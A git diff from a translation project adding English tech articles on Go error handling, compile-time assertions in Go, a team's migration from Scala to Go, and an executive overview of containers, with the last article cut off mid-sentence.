to know where it occurred in the call stack_. This is because of stack traces, which raises something I don’t get about Go – you have the concept of `panic` in Go which contains a stack trace, but an `error` which does not. I think the reasoning is that a `panic` can crash your program, so requires a stack trace, whereas a handled error does not as you are supposed to do something about it where it occurs. + +So let’s go back to our previous example – a third party library with a poor error message, which just gets propagated all the way up the call chain. Do you think debugging would be easier if you had this? + +``` +panic: Oh no I broke +[signal 0xb code=0x1 addr=0x0 pc=0xfc90f] + +goroutine 1103 [running]: +panic(0x4bed00, 0xc82000c0b0) +/usr/local/go/src/runtime/panic.go:481 +0x3e6 +github.com/Org/app/core.(_app).captureRequest(0xc820163340, 0x0, 0x55bd50, 0x0, 0x0) +/home/ubuntu/.go_workspace/src/github.com/Org/App/core/main.go:313 +0x12cf +github.com/Org/app/core.(_app).processRequest(0xc820163340, 0xc82064e1c0, 0xc82002aab8, 0x1) +/home/ubuntu/.go_workspace/src/github.com/Org/App/core/main.go:203 +0xb6 +github.com/Org/app/core.NewProxy.func2(0xc82064e1c0, 0xc820bb2000, 0xc820bb2000, 0x1) +/home/ubuntu/.go_workspace/src/github.com/Org/App/core/proxy.go:51 +0x2a +github.com/Org/app/core/vendor/github.com/rusenask/goproxy.FuncReqHandler.Handle(0xc820da36e0, 0xc82064e1c0, 0xc820bb2000, 0xc5001, 0xc820b4a0a0) +/home/ubuntu/.go_workspace/src/github.com/Org/app/core/vendor/github.com/rusenask/goproxy/actions.go:19 +0x30 +``` + +I think this might be something which has been overlooked in the design of Go – not that things aren’t overlooked in all languages. + +If we use Java as an arbitrary example, one of the silliest mistakes people make is not logging the stack trace: + +``` +LOGGER.error(ex.getMessage()) // Doesn't log stack trace +LOGGER.error(ex.getMessage(), ex) // Does log stack trace +``` + +But Go seems to not have this information by design. + +In terms of getting context information – Russ also mentions the community are talking about some potential interfaces for stripping out error contexts. It would be interesting to hear more about this. + +### Solution to the Stack Trace Problem + +Fortunately, after doing some searching, I found this excellent [Go Errors][5] library which helps solves the problem, by adding stack traces to errors: + +``` +if errors.Is(err, crashy.Crashed) { + fmt.Println(err.(*errors.Error).ErrorStack()) +} +``` + +However, I’d think it would be an improvement for this feature to have first class citizenship in the language, so you wouldn’t have to fiddle around with types. Also, if we are working with a third party library like in the previous example then it is probably not using `crashy` – we still have the same problem. + +### What Should We Do with an Error? + +We also have to think about what should happen when an error occurs. [It’s definitely useful that they can’t crash your program][6], and it’s also idiomatic to handle them immediately: + +``` +err := method() +if err != nil { + // some logic that I must do now in the event of an error! +} +``` + +But what happens if we want to call lots of methods which return errors, and then handle them all in the same place? Something like this: + +``` +err := doSomething() +if err != nil { + // handle the error here +} + +func doSomething() error { + err := someMethod() + if err != nil { + return err + } + err = someOther() + if err != nil { + return err + } + someOtherMethod() +} +``` + +It feels a little verbose, whereas in other languages you can treat multiple statements that fail as a block: + +``` +try { + someMethod() + someOther() + someOtherMethod() +} +catch (Exception e) { + // process exception +} +``` + +Or just propagate failure in the method signature: + +``` +public void doSomething() throws SomeErrorToPropogate { + someMethod() + someOther() + someOtherMethod() +} +``` + +Personally I think both of these example achieve the same thing, only the `Exception` model is less verbose and more flexible. If anything, I find the `if err != nil` to feel like boilerplate. Maybe there is a way that it could be cleaned up? + +### Treating Multiple Statements That Fail as a Block + +To begin with, I did some more reading and found a relatively pragmatic solution on the [by Rob Pike on the Go Blog.][7] + +He defines a struct with a method which wraps errors: + +``` +type errWriter struct { + w io.Writer + err error +} + +func (ew *errWriter) write(buf []byte) { + if ew.err != nil { + return + } + _, ew.err = ew.w.Write(buf) +} +``` + +This let’s us do: + +``` +ew := &errWriter{w: fd} +ew.write(p0[a:b]) +ew.write(p1[c:d]) +ew.write(p2[e:f]) +// and so on +if ew.err != nil { + return ew.err +} +``` + +This is also a good solution, but I still feel like something is missing – as we can’t re-use this pattern. If we wanted a method which took a string as an argument, then we’d have to change the function signature. Or what if we didn’t want to perform a write? We could try and make it more generic: + +``` +type errWrapper struct { + err error +} +``` + +``` +func (ew *errWrapper) do(f func() error) { + if ew.err != nil { + return + } + ew.err = f(); +} +``` + +But we have the same problem that it won’t compile if we want to call functions which have different arguments. However you simply wrap those function calls: + +``` +w := &errWrapper{} + +w.do(func() error { + return someFunction(1, 2); +}) + +w.do(func() error { + return otherFunction("foo"); +}) + +err := w.err + +if err != nil { +// process error here +} +``` + +This works, but doesn’t help too much as it ends up being more verbose than the standard `if err != nil`checks. I would be interested to hear if anyone can offer any other solutions. Maybe the language itself needs some sort of way to propagate or group errors in a less bloated fashion – but it feels like it’s been specifically designed to not do that. + +### Conclusion + +After reading this, you might think that by picking on `errors` I’m opposed to Go. But that’s not the case, I’m just describing how it compares to my experience with the `try catch` model. It’s a great language for systems programming, and some outstanding tools have been produced by it. To name a few there is [Kubernetes][8], [Docker][9], [Terraform][10], [Hoverfly][11] and others. There’s also the advantage of your tiny, highly performant, native binary. But `errors` have been difficult to adjust to. I hope my reasoning makes sense, and also that some of the solutions and workarounds could be of help. + +-------------------------------------------------------------------------------- + +作者简介: + +Andrew is a Consultant for OpenCredo having Joined the company in 2015. Andrew has several years experience working in the across a number of industries, developing web-based enterprise applications. + +-------------------------------------------------------------------------------- + + +via: https://opencredo.com/why-i-dont-like-error-handling-in-go + +作者:[Andrew Morgan][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opencredo.com/author/andrew/ +[1]:https://blog.golang.org/errors-are-values +[2]:https://blog.golang.org/error-handling-and-go +[3]:https://en.wikipedia.org/wiki/Don't_repeat_yourself +[4]:https://research.swtch.com/go2017 +[5]:https://github.com/go-errors/errors +[6]:https://davidnix.io/post/error-handling-in-go/ +[7]:https://blog.golang.org/errors-are-values +[8]:https://kubernetes.io/ +[9]:https://www.docker.com/ +[10]:https://www.terraform.io/ +[11]:http://hoverfly.io/en/latest/ diff --git a/sources/tech/20170124 Compile-time assertions in Go.md b/sources/tech/20170124 Compile-time assertions in Go.md new file mode 100644 index 0000000000..643c27c9d4 --- /dev/null +++ b/sources/tech/20170124 Compile-time assertions in Go.md @@ -0,0 +1,141 @@ +Compile-time assertions in Go +============================================================ + + +This post is about a little-known way to make compile-time assertions in Go. You probably shouldn’t use it, but it is interesting to know about. + +As a warm-up, here’s a fairly well-known form of compile-time assertions in Go: Interface satisfaction checks. + +In this code ([playground][1]), the `var _ =` line ensures that type `W` is a `stringWriter`, as checked for by [`io.WriteString`][2]. + +``` +package main + +import "io" + +type W struct{} + +func (w W) Write(b []byte) (int, error) { return len(b), nil } +func (w W) WriteString(s string) (int, error) { return len(s), nil } + +type stringWriter interface { + WriteString(string) (int, error) +} + +var _ stringWriter = W{} + +func main() { + var w W + io.WriteString(w, "very long string") +} +``` + +If you comment out `W`’s `WriteString` method, the code will not compile: + +``` +main.go:14: cannot use W literal (type W) as type stringWriter in assignment: + W does not implement stringWriter (missing WriteString method) +``` + +This is useful. For most types that satisfy both `io.Writer` and `stringWriter`, if you eliminate the `WriteString` method, everything will continue to work as it did before, but with worse performance. + +Rather than trying to write a fragile test for a performance regression using [`testing.T.AllocsPerRun`][3], you can simply protect your code with a compile-time assertion. + +Here’s [a real world example of this technique from package io][4]. + +* * * + +OK, onward to obscurity! + +Interface satisfaction checks are great. But what if you wanted to check a plain old boolean expression, like `1+1==2`? + +Consider this code ([playground][5]): + +``` +package main + +import "crypto/md5" + +type Hash [16]byte + +func init() { + if len(Hash{}) < md5.Size { + panic("Hash is too small") + } +} + +func main() { + // ... +} +``` + +`Hash` is perhaps some kind of abstracted hash result. The `init` function ensures that it will work with [crypto/md5][6]. If you change `Hash` to be (say) `[8]byte`, it’ll panic when the process starts. However, this is a run-time check. What if we wanted it to fail earlier? + +Here’s how. (There’s no playground link, because this doesn’t work on the playground.) + +``` +package main + +import "C" + +import "crypto/md5" + +type Hash [16]byte + +func hashIsTooSmall() + +func init() { + if len(Hash{}) < md5.Size { + hashIsTooSmall() + } +} + +func main() { + // ... +} +``` + +Now if you change `Hash` to be `[8]byte`, it will fail during compilation. (Actually, it fails during linking. Close enough for our purposes.) + +``` +$ go build . +# demo +main.hashIsTooSmall: call to external function +main.init.1: relocation target main.hashIsTooSmall not defined +main.init.1: undefined: "main.hashIsTooSmall" +``` + +What’s going on here? + +`hashIsTooSmall` is [declared without a function body][7]. The compiler assumes that someone else will provide an implementation, perhaps an assembly routine. + +When the compiler can prove that `len(Hash{}) < md5.Size`, it eliminates the code inside the if statement. As a result, no one uses the function `hashIsTooSmall`, so the linker eliminates it. No harm done. As soon as the assertion fails, the code inside the if statement is preserved.`hashIsTooSmall` can’t be eliminated. The linker then notices that no one else has provided an implementation for the function and fails with an error, which was the goal. + +One last oddity: Why `import "C"`? The go tool knows that in normal Go code, all functions must have bodies, and instructs the compiler to enforce that. By switching to cgo, we remove that check. (If you run `go build -x` on the code above, without the `import "C"` line, you will see that the compiler is invoked with the `-complete` flag.) An alternative to adding `import "C"` is to [add an empty file called `foo.s` to the package][8]. + +I know of only one use of this technique, in the [compiler test suite][9]. There are other [imaginable places to apply it][10], but no one has bothered. + +And that’s probably how it should be. :) + + +-------------------------------------------------------------------------------- + +via: http://commaok.xyz/post/compile-time-assertions + +作者:[Josh Bleecher Snyder][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://twitter.com/commaok +[1]:https://play.golang.org/p/MJ6zF1oNsX +[2]:https://golang.org/pkg/io/#WriteString +[3]:https://golang.org/pkg/testing/#AllocsPerRun +[4]:https://github.com/golang/go/blob/go1.8rc2/src/io/multi.go#L72 +[5]:https://play.golang.org/p/mjIMWsWu4V +[6]:https://golang.org/pkg/crypto/md5/ +[7]:https://golang.org/ref/spec#Function_declarations +[8]:https://github.com/golang/go/blob/go1.8rc2/src/os/signal/sig.s +[9]:https://github.com/golang/go/blob/go1.8rc2/test/fixedbugs/issue9608.dir/issue9608.go +[10]:https://github.com/golang/go/blob/go1.8rc2/src/runtime/hashmap.go#L261 diff --git a/sources/tech/20170124 Making the move from Scala to Go and why were not going back.md b/sources/tech/20170124 Making the move from Scala to Go and why were not going back.md new file mode 100644 index 0000000000..61283e4986 --- /dev/null +++ b/sources/tech/20170124 Making the move from Scala to Go and why were not going back.md @@ -0,0 +1,277 @@ +Making the move from Scala to Go, and why we’re not going back +============================================================ + + + ![](https://movio-live-2bb6ef96eabb4f369327a8b01ec1-73a1b1f.aldryn-media.io/filer_public_thumbnails/filer_public/97/74/977485bc-9142-49d0-b0e4-de3e78a3b002/hero_golang.jpg__800x0_q90_crop_subsampling-2.jpg) + +Here’s the story of why we chose to migrate from [Scala][1] to [Go,][2] and gradually rewrote part of our Scala codebase to Go. As a whole, Movio hosts a much broader and diverse set of opinions, so the “we” in this post accounts for Movio Cinema’s Red Squad only. Scala remains the primary language for some Squads at Movio. + +### Why we loved Scala in the first place + +What made Scala so attractive? This can easily be explained if you consider our backgrounds. Here's the succession of favorite languages over time for some of us: + + ![Basic, Q Basic, Node JS, Scheme, Smalltalk, PHP, Python, Java, Scala, Golang](https://movio-live-2bb6ef96eabb4f369327a8b01ec1-73a1b1f.aldryn-media.io/filer_public/c5/42/c54225ad-f569-482e-8f51-be8e9a83eb9f/in_blog_diagrams-01final_1.jpg) + +As you can see, we largely came from the stateful procedural world. + +With Scala coming onto the scene, functional programming gained hype and it really clicked with us. [Pure functions][3] made deterministic tests easy, and then [TDD][4] gained popularity and also spoke to our issues with software quality. + +I think the first time I appreciated the positive aspects of having a strong type system was with Scala. Personally, coming from a myriad of PHP silent errors and whimsical behavior, it felt quite empowering to have the confidence that, supported by type-checking and a few well-thought-out tests, my code was doing what it was meant to. On top of that, it would keep doing what it was meant to do after refactoring, otherwise breaking the type-checking or the tests. Yes, Java gave you that as well but without the beauty of FP, and with all the baggage of the EE. + +There are other elusive qualities that make Scala extremely sexy for nerds. It allows you to create your own operators or override existing ones, essentially being unary and binary functions with non-alphanumeric identifiers. You can also extend the compiler via macros (user-defined functions that are called by the compiler), and enrich a third-party library via implicit classes, also known as the "pimp my library" pattern. + +But Scala wasn’t without its problems. + +### Slow compilation + +The slowness of the Scala compiler, an issue [acknowledged and thoroughly described][5] by Martin Odersky, was a source of constant frustration. Coupled with a big monolith and a complex dependency tree with a complicated resolving mechanism - and after years of great engineers babysitting it - adding a property on a model class in one of our core modules would still mean a coffee break, or a [sword fight.][6] Most importantly, it became rare to have acceptable coding feedback loop times (i.e. delays in between code-test-refactor iterations). + +### Slow deployments + +Slow compile times and a big monolith meant really slow CI and, in turn, lengthy deploys. Luckily, the smart engineers on Movio Cinema's Blue Squad were able to parallelize module tests on different nodes, bringing the overall CI times from more than an hour to as little as 20 minutes. This was a great success, but still an issue for agile deployments. + +### Tooling + +IDE support was poor. [Ensime's][7] troubles with multiple Scala version projects (different versions on different modules) made it impractical to support optimize imports, non-grep-based jump to definition, and the like. This meant that all open-source and community-driven IDEs (e.g. vim, Emacs, atom) would have less-than-ideal feature sets. The language seems too complex to make tooling for! + +Even the more ambitious attempts at Scala integration struggled on multiple project builds, most notably Jetbrains' [Intellij Scala Plugin,][8]with jump-to-definition taking us to outdated JARs rather than the modified files. We've seen broken highlighting on code using advanced language features, too. + +On the lighter side of things, we were able to identify exactly whether a programmer was using [IDEA][9] or [sbt][10] based purely on the loudness of their laptop fans. On a MacBook Pro, this is a real problem for anyone hoping to embark on an extended programming session away from a power outlet. + +### Developments in the global Scala community (and non-Scala) + +Criticism for object-oriented programming had been lingering in the office for some time, but it hadn’t reached mainstream status until someone shared [this blog post][11] by [Lawrence Krubner.][12] Since then, it has become easier to float the idea of alternative non-OOP languages. For example, at one stage there were several of us learning Haskell, among other experiments. + +Though old news, the famous 2011 "Yammer moving away from Scala" [email from Coda Hale to the Scala team][13] started to make a lot of sense once our mindset shifted. Consider this quote: + +_“A lot of this [complexity] has been waved away as something only library authors really need to know about, but when an library's API bubbles all of this up to the top (and since most of these features resolve specifics at the call site, they do), engineers need to have an accurate mental model of how these libraries work or they shift into cargo-culting snippets of code as magic talismans of functionality.”_ + +Since then, bigger players have followed, Twitter and [LinkedIn][14] being notable examples. + +The following is a quote from Raffi Krikorian on Twitter: + +_“What I would have done differently four years ago is use Java and not used Scala as part of this rewrite. [...] it would take an engineer two months before they're fully productive and writing Scala code.”_ + +[Paul Phillips'][15] departure from Scala's core team, and [his long talk][16] discussing it, painted a disturbing picture of the state of the language - one of stark contrast to the image we had. + +For further disturbing literature, you can find the whole vanguard of the Scala community in [this JSON AST debate.][17]  Reading this as it developed left some of us feeling like this: + +[ + ![Bed Meme](https://movio-live-2bb6ef96eabb4f369327a8b01ec1-73a1b1f.aldryn-media.io/filer_public/34/38/34388571-2d88-49f4-9cb5-b1603ca75568/screen_shot_2017-01-19_at_100025_am.png) +][18] + +### The need for an alternative + +Until ‘Go’ came into the spotlight, though, there seemed to be no real alternative to Scala for us; there was simply no plausible option raising the bar. Consider this quote from the popular Coursera blog post  ['Why we love Scala at Coursera':][19] + +_“I personally found compilation and reload times pretty acceptable (not as tight as PHP's edit-test loop, but acceptable given the type-checking and other niceties we get with Scala).”_ + +And this other one from the same blog post: + +_“Yes, scalac is slow. On the other hand, dynamic languages require you to incessantly re-run or test your code until you work out all the type errors, syntax errors and null dereferencing. I'd rather have a sip of coffee while scalac does all this work for me.”_ + +### Why ‘Go’ made sense + +### It's simple to learn + +It took some of us six months including some [after hours MOOCs,][20] to be able to get relatively comfortable with Scala. In contrast, we picked up ‘Go’ in two weeks. In fact, the first time I got to code some Go was at a [Code Retreat][21] about 10 months ago. I was able to code a very basic [Mario-like platform game!][22] + +We've also feared that a lower-level language would force us to deal with an unnecessary layer of complexity that was hidden by high-level abstractions in Scala e.g. [Futures][23] hiding threads. Interestingly, what we've had to review were things like [signals,][24] [syscalls][25] and [mutexes,][26]which is actually not such a bad thing for so-called full-stack developers! + +For the first time ever, we actually read [the language spec][27] when we’re unsure of how something works. That's how simple it is; the spec is readable! For my average-sized brain, this actually means a lot. Part of my frustration with Scala (and Java) was the feeling that I was never able to get the full context on a given problem domain, due to its complexity. An approachable and complete guide to the language strengthens my confidence in making assumptions while following a piece of code, and in justifying my decision-making rationale. + +### Simpler code is more readable code + +No map, no flatMap, no fold, no generics, no inheritance… Do we miss them? Perhaps we did, for about two weeks. + +It’s hard to explain why it’s preferable to obtain expressiveness without actually ‘Go’ing through the experience yourself - pun intended. However, Russ Cox, Golang's Tech Lead, does a good job of it in the “Go Balance” section of [his 2015 keynote][28] at GopherCon. + +As it turned out, more flexibility led to devs writing code that others actually struggled to understand. It would be tough to decide if one should feel ashamed for not being smart enough to grasp the logic, or annoyed at the unnecessary complexity. On the flip side, on a few occasions one would feel "special" for understanding and applying concepts that would be hard for others. Having this smartness disparity between devs is really bad for team dynamics, and complexity leads invariably to this. + +In terms of code complexity, this wasn't just the case for our Squad; some very smart people have taken it (and continue to take it) to the extreme. The funny part is that, because dependency hell is so ubiquitous in Scala-land (which includes Java-land), we ended up using some of the projects that we deemed too complex for our codebase (e.g scalaz) via transitive dependencies. + +Consider these randomly selected examples from some of the Scala libraries we've been using (and continue to maintain): + +[Strong Syntax][29]   +(What is this file's purpose, without being a theoretical physicist?) + +[Content Type][30]  +(broke Github's linter) + +[Abstract Table][31]  +(Would you explain foreignKey's signature to me?) + +While still on the Scala happiness train, we read [this post][32] with great curiosity (originally posted [here,][33] but site is now down). I find myself wholeheartedly agreeing with it today. + +### Channels and goroutines have made our job so much easier + +It's not just the fact that channels and goroutines are [cheaper in terms of resources,][34] compared to threadpool-based Futures and Promises, resources being memory and CPU. They are also easier to reason about when coding. + +To clarify this point, I think that both languages and their different approaches can basically do the same job, and you can reach a point where you are equally comfortable working with either. Perhaps the fact that makes it simpler in ‘Go’ is that there's usually one limited set of tools to work with, which you use repeatedly and get a chance to master. With Scala, there are way too many options that evolve too frequently (and get superseded) to become proficient with. + +### Case study + +Recently, we've been struggling with an issue where we had to process some billing information. + +The data came through a stream, and had to be persisted to a MariaDB database. As persisting directly was impractical due to the high rate of data consumption, we had to buffer and aggregate, and persist on buffer full or after a timeout. + + ![Kafka, MariaDB, buf](https://movio-live-2bb6ef96eabb4f369327a8b01ec1-73a1b1f.aldryn-media.io/filer_public/42/06/42063b14-d329-4168-b031-2b05fb1beeef/in_blog_diagrams-02final.jpg) + +First, we made the mistake of making the `persist` function [synchronized.][35] This guaranteed that buffer-full-based invocations would not run concurrently with timeout-based invocations. However, because the stream digest and the `persist` functions did run concurrently and manipulated the buffer, we had to further synchronize those functions to each other! + +In the end, we resorted to the [Actor system,][36] as we had Akka in the module's dependencies anyway, and it did the job. We just had to ensure that adding to the buffer and clearing the buffer were messages processed by the same Actor, and would never run concurrently. This is just fine, but to get there we needed to; learn the Actor System, teach it to the newcomers, import those dependencies, have Akka properly configured in the code and in the configuration files, etc. Furthermore, the stream came from a Kafka Consumer, and in our wrapper we needed to provide a `digest` function for each consumed message that ran in a `Future`. Circumventing the issue of mixing Futures and Actors required extra head scratching time. + +Enter channels. + +``` +buffer := []kafkaMsg{} +bufferSize := 100 +timeout := 100 * time.Millisecond + +for { + select { + case kafkaMsg := <-channel: + buffer = append(buffer, kafkaMsg) + if len(buffer) >= bufferSize { + persist() + } + case<-time.After(timeout): + persist() + } +} + +func persist() { + insert(buffer) + buffer = buffer[:0] +} +``` + +Done; Kafka sends to a channel. Consuming the stream and persisting the buffer never run concurrently, and a timer is reset to timeout 100 milliseconds after no messages received. + +Further reading; a few more illustrative channel examples: + +[Parallel processing with ordered output][37] + +[A simple strategy for server-side backpressure][38] + +### It compiles fast and runs fast + +Go runs [very fast.][39] + +Our Go microservices currently: + +* Build in 5 seconds or less +* Test in 1 or 2 seconds (including integration tests) +* run in our CI infrastructure in less than half a minute (and we're looking into it, because that's unacceptable!), outputting a Docker container +* Deploy (via Kubernetes) new containers in 10 seconds or less (key factor here being small images) + +A feedback loop of one second on our daily struggle with computers has made us more productive and happy. + +### Microservice panacea: from dev-done to deployed in less than a minute on cheap boxes + +We've found that Go microservices are a great fit for distributed systems. + +Consider how well it fits with the requirements: + +* Tiny-sized containers: our average Go docker container is 16.5MB, vs 220MB for Scala +* Low-memory footprint: mileage may vary; recently, we’ve had a major success when rewriting a crucial µs from Scala to Go and going from 4G to 300M for the worst-case scenario usage +* Fast starts and fast shutdowns: just a binary; no need to start a VM + +For us, the fatter Scala images not only meant more money spent on cloud bills, but crucially container orchestration delays. Re-scheduling a container on a different Kubernetes node requires pulling the image from a registry; the bigger the image, the more time it takes. Not to mention, pulling the latest image locally on our laptops! + +### Last but not least: tooling + +In the Red Squad, we have a very diverse choice of IDEs: + + ![Golang Diagram 2](https://movio-live-2bb6ef96eabb4f369327a8b01ec1-73a1b1f.aldryn-media.io/filer_public/a7/e6/a7e6b54b-c37b-4557-9039-9eca35ecc7d8/in_blog_diagrams-03final_2.jpg) + +Go plays really well with all of them! Tools are also steadily improving over time, and new tools are created often. + +My personal favourite item in our little ‘Go’ rebellion: for the first time ever, we make our own tooling! + +Here's a selection of our open source projects we're currently using at work: + +[kt][40] + +Kafka tool for consuming, producing and getting info about Kafka topics; composes nicely with jq. + +[kubemrr][41] + +Kubernetes Mirror; bash/zsh autocompletion for kubectl parameters (e.g. pod names). + +[sql][42] + +MySQL pipe; sends queries to one, many or all your MySQL instances, local or remote, or behind SSH tunnels, and outputs conveniently for further processing. Composes nicely with [chart;][43] another tool we've written for quick ad-hoc charting. + +[flowbro][44] + +Real-time and after-the-fact visualization for Kafka-based distributed systems. + +### So... Go all the things? + +Not so fast. There's much we're not wise enough to comment on yet. Movio's use cases are only a subset of a very long and diverse list of requirements. + +* Choose based on your use case. For example, if your main focus is around data science you might be better off with the Python stack +* Depending on the ecosystem that you come from, a library that you’re using might not exist or not be as mature as in Java. For example, the Kafka maintainers are providing client libraries in Java, and the Go versions will naturally lag behind the JVM versions +* Our microservices generally do one tiny specific thing; when we reach a certain level of complexity we usually spawn new microservices. Complex logic might be cumbersome to express with the simple tools that Go provides. So far, this has not been a problem for us + +Golang is certainly a good fit for our squad! See how it “Goes” for you :P + +-------------------------------------------------------------------------------- + +via: https://movio.co/blog/migrate-Scala-to-Go/?utm_source=golangweekly&utm_medium=email + +作者:[Mariano Gappa ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://movio.co/blog/author/mariano/ +[1]:https://www.scala-lang.org/ +[2]:https://golang.org/ +[3]:https://en.wikipedia.org/wiki/Pure_function +[4]:https://en.wikipedia.org/wiki/Test-driven_development +[5]:http://stackoverflow.com/questions/3490383/java-compile-speed-vs-scala-compile-speed/3612212#3612212 +[6]:https://xkcd.com/303/ +[7]:https://github.com/ensime +[8]:https://confluence.jetbrains.com/display/SCA/Scala+Plugin+for+IntelliJ+IDEA +[9]:https://en.wikipedia.org/wiki/IntelliJ_IDEA +[10]:http://www.scala-sbt.org/ +[11]:http://www.smashcompany.com/technology/object-oriented-programming-is-an-expensive-disaster-which-must-end +[12]:https://twitter.com/krubne +[13]:https://codahale.com/downloads/email-to-donald.txt +[14]:https://www.quora.com/Is-LinkedIn-getting-rid-of-Scala/answer/Kevin-Scott +[15]:https://github.com/paulp +[16]:https://www.youtube.com/watch?v=TS1lpKBMkgg +[17]:https://github.com/scala/slip/pull/28 +[18]:https://xkcd.com/386/ +[19]:https://building.coursera.org/blog/2014/02/18/why-we-love-scala-at-coursera/ +[20]:https://www.coursera.org/learn/progfun1 +[21]:http://movio.co/blog/tech-digest-global-day-of-coderetreat-2016/ +[22]:https://github.com/MarianoGappa/gomario +[23]:http://docs.scala-lang.org/overviews/core/futures.html +[24]:https://en.wikipedia.org/wiki/Unix_signa +[25]:https://en.wikipedia.org/wiki/System_call +[26]:https://en.wikipedia.org/wiki/Mutual_exclusion +[27]:https://golang.org/ref/spec +[28]:https://www.youtube.com/watch?v=XvZOdpd_9tc&t=3m25s +[29]:https://github.com/scalaz/scalaz/blob/series/7.3.x/core/src/main/scala/scalaz/syntax/StrongSyntax.scala +[30]:https://github.com/spray/spray/blob/master/spray-http/src/main/scala/spray/http/ContentType.scala +[31]:https://github.com/slick/slick/blob/master/slick/src/main/scala/slick/lifted/AbstractTable.scala +[32]:http://126kr.com/article/8sx2b2nrcc7 +[33]:http://jimplush.com/talk/2015/12/19/moving-a-team-from-scala-to-golang/ +[34]:https://dave.cheney.net/2015/08/08/performance-without-the-event-loop +[35]:https://docs.oracle.com/javase/tutorial/essential/concurrency/syncmeth.html +[36]:http://doc.akka.io/docs/akka/current/general/actor-systems.html +[37]:https://gist.github.com/MarianoGappa/a50c4a8a302b8378c08c4b0d947f0a33 +[38]:https://gist.github.com/MarianoGappa/00b8235deffab51271ea4177369cfe2e +[39]:http://benchmarksgame.alioth.debian.org/u64q/go.html +[40]:https://github.com/fgeller/kt +[41]:https://github.com/mkokho/kubemrr +[42]:https://github.com/MarianoGappa/sql +[43]:https://github.com/MarianoGappa/chart +[44]:https://github.com/MarianoGappa/flowbro +[45]:https://movio.co/blog/author/mariano/ +[46]:https://movio.co/blog/category/technology/ +[47]:https://movio.co/blog/migrate-Scala-to-Go/?utm_source=golangweekly&utm_medium=email#disqus_thread diff --git a/sources/tech/20170125 An executives guide to containers.md b/sources/tech/20170125 An executives guide to containers.md new file mode 100644 index 0000000000..6967275d56 --- /dev/null +++ b/sources/tech/20170125 An executives guide to containers.md @@ -0,0 +1,130 @@ +An executive's guide to containers +============================================================ + + ![An executive's guide to containers](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/containers_2015-1-osdc-lead.png?itok=E1imOYe4 "An executive's guide to containers") +Image credits : [Maersk Line][1]. [CC SA-BY 4.0][2] + +Discussions with IT leaders about "[containers][4]" can often be summarized as this: + +_As a CxO, I face the constant challenge of doing more with less. IT budgets continue to decrease and I have less resources, yet the amount of work to deliver is greater than ever before. I spend far too many hours dedicated to resolving budgetary constraints. In addition, the IT landscape is undergoing a rapid change and new technologies are being introduced all the time. The latest topic I hear from my trusted advisors is the implementation of a "container strategy." I want to understand:_ + +1. _What are containers?_ +2. _What is the enterprise value to transitioning to containers?_ +3. _Why should I shift to containers now? Are there disadvantages if we don't adopt?_ +4. _Are containers mature enough for enterprise consumption?_ +5. _How do I get my enterprise up to speed with container adoption?_ + +Let's start at the beginning. + +### Containers + +In the past 10 years or so, enterprises have moved from physical infrastructure to virtual machines (VMs). The key advantage of moving towards VMs is a reduction in the datacenter footprint. You can fit more applications on a fewer number of physical machines by running multiple VMs on the same physical box. Using containers is another way of packing applications in a much lighter weight and with a much faster delivery model. They are a fancy way of running multiple application processes on a single box, regardless of whether that box is a VM or a physical machine. In addition, containers also play a major role in the context of fulfilling DevOps, microservices, and cloud strategy. + +### Containers versus VMs + +Containers differ from VMs in a few simple ways. A VM, while not a physical machine, behaves just like one. It is an isolated environment that includes everything, starting with a complete (guest) operating system. On the other hand, containers are processes that share the resources on the same machine, which could be physical or virtual. Containers are notably interesting because: + +* VMs are heavy, comparatively. Containers are light because they only include those libraries needed by the applications they run. +* VMs take minutes to start up. Containers start up in seconds. +* Typically, many more containers fit into your infrastructure than VMs. + + ![Containers versus VMs](https://opensource.com/sites/default/files/containersvmvscontainers.png "Containers versus VMs") + +The technology has evolved enough to keep these containers secure, isolated from each other, and "with right design choices" to make sure that bad containers don't affect the performance of other containers running on the same box. In fact, operating systems are built to optimize and run containers natively. + +Still, you need to make the right choices when moving toward containers. You need to do enough due diligence so you choose the right technology partners and vendors to enable containers. Open source technologies play a key role. The open source [Docker project][5] has made containers with a layering format that is easy to build and use. The [Open Container Initiative][6] (OCI) has become an open source standard for containers supported by all major technology vendors. Open source technology providers like Red Hat make container-ready, secure operating systems available. For example, Red Hat Enterprise Linux 7.x , including Red Hat Enterprise Linux Atomic Host, are optimized to run containers natively and also provide tools to monitor and manage containers. Other open source projects such as CoreOS from Tectonic are also coming into the market. Indeed, containers are ready for adoption by enterprises. + +### Container platforms + +Container platforms make containers enterprise-consumable. You may have dealt with VM sprawl in your enterprises over the past decade, and container sprawl can be many times worse. Running your containers at scale across the various hosts in your datacenter, ensuring high availability for your applications despite container failure, automated health checks, automated scaling of containers based on incoming workloads, etc., are some of the key features you can expect from a container platform. + +While running containers on such a platform is positioned as Container-as-a-Service model (CaaS), some additional features of these platforms, such as build and deployment automation, make this platform a full-fledged Platform-as-a-Service (PaaS). While CaaS can run containers for you at scale, PaaS would take your source code, build it, create containers, and run those containers for you. In addition, these platforms provide complete operations management features, such as management and monitoring of the cluster, detection of security flaws with the containers and run safe containers, tracking logs and metrics, etc. + +While some vendors are using their proprietary technologies to build container platforms, in general, companies are standardizing them around open source technologies built around [Kubernetes][7] (or K8S in short). K8S is an open source project that was started by Google, and many large platform vendors now support it. K8S is also part of [Cloud Native Computing Foundation][8] (CNCF), which is evolving as a standards body for cloud-centric technologies. Standardization around open source orchestration technologies is very important when you make your choices on a container platform. It basically allows you be portable across container platforms if you don't like the choice you made the first time. K8S also allows your container workloads to be portable across different public clouds. These are the reasons why we see more and more technology companies using Kubernetes. + +A few enterprises are trying to build their own DIY container platforms by stitching together several open source projects that include K8S. This is definitely a better solution than going with proprietary technologies, but it also includes lot of plumbing to get it to work. However, an enterprise's ability to sustain and maintain such DIY platforms should be considered seriously. Many enterprises are not in the job of creating IT Platforms, rather they wish to run their mainstream business. There are many K8S-based solutions available, such as [Red 